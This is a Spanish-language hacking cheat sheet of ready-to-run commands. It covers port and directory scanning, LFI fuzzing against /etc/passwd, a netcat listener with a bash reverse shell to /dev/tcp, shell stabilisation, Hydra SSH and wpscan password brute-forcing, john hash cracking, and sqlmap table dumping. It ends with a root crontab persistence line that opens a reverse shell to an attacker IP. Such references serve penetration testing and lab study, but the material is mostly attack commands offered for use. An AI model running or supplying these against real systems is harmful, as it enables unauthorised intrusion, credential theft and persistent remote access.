Sentencias hacking
1. Escaneo de Puertos con Nmap
nmap -p- --open -sSVC --min-rate 5000 <IPOBJETIVO> -vvv -n -Pnnmap -A -n -Pn <IPOBJETIVO>2. Escaneo de Directorios
Gobuster
gobuster dir -u http://<IPOBJETIVO> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 50Si hacemos escaneo a través de un proxy
gobuster dir -u http://<IPOBJETIVO>/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt --proxy socks5://127.0.0.1:1080Feroxbuster
feroxbuster -u http://<IPOBJETIVO>/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt 2>/dev/nullwfuzz
wfuzz -c –hl=1 –hc=404 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://IP/X.php?FUZZ=/etc/passwd3. Reverse Shell y Terminal en Escucha
Generador de reverse shells
Poner el listener en escucha:
nc -nlvp 3333Ejemplo de Reverse Shell con Bash:
bash -i >& /dev/tcp/192.168.1.10/3333 0>&14. Mejorar una Reverse Shell
Generamos una bash mediante un script dentro de la maquina objetivo
script /dev/null -c bashSuspender shell
Ctrl + zRecuperar shell
stty raw -echo;fgReinicio de shell
reset xterm
export SHELL=bash && export TERM=xtermPara que no de fallos, mirar en maquina local cantidad de columnas y filas de terminal
stty size
# ejemplo resultado = 34 100Aplicar en el terminal de maquina objetivo
stty rows 34 columns 1005. Escaneo de DNS con dig
dig any ejemplo.com @8.8.8.8Para enumerar subdominios:
for sub in $(cat subdomains.txt); do dig +short $sub.ejemplo.com; done6. Comandos Básicos en MySQL
mysql -u root -pComandos útiles dentro de MySQL:
SHOW DATABASES; -- Lista bases de datos
USE nombre_bd; -- Selecciona base de datos
SHOW TABLES; -- Lista tablas
DESCRIBE nombre_tabla; -- Muestra estructura de una tabla
SELECT * FROM nombre_tabla; -- Muestra contenido de una tabla7. Fuerza Bruta
Hydra
hydra -l root -P pass.txt 192.168.1.10 sshJohn
zip2john archivo.zip > archivo.hash # extraer hash de un zip
john --wordlist=/usr/share/wordlists/rockyou.txt archivo.hash # descifrar hash8. SQLmap
sqlmap -u http://<IPOBJETIVO>:<puerto>/<dir_form> --forms --batch -dbs # muestra bases de datos
sqlmap -u http://<IPOBJETIVO>:<puerto>/<dir_form> --forms --batch -D <DB_name> --tables #trata bases de datos
sqlmap -u http://<IPOBJETIVO>:<puerto>/<dir_form> --forms --batch -D <DB_name> -T <Table_name> --dump #trata tablas9. Web
Nikto
nikto -h [<http://target-site.com>](<http://target-site.com/>)whatweb
whatweb http://<IPOBJETIVO>Payloadsallthethings (repo de git)
10. WordPress
wpscan --url <http://192.168.1.40> --enumerate p,t # buscar temas y plugins
wpscan --url <url_dir> --enumerate u,vp # enumerar usuarios
wpscan --url <url_dir> --passwords <dir_diccionario> --usernames facultad # fuerza bruta 11. Linux
Find
find / -perm 400 2>/dev/null # busqueda por permiso
find / -group <grupo> 2>/dev/null # busqueda por grupoPersistencias
echo '* * * * * root bash -i >& /dev/tcp/<TU_IP>/4444 0>&1' >> /etc/crontab # crontab de root
lsb_release -a #Muestra versiones y detalles del sistemaPython
python3 -m http.server 8080Última actualización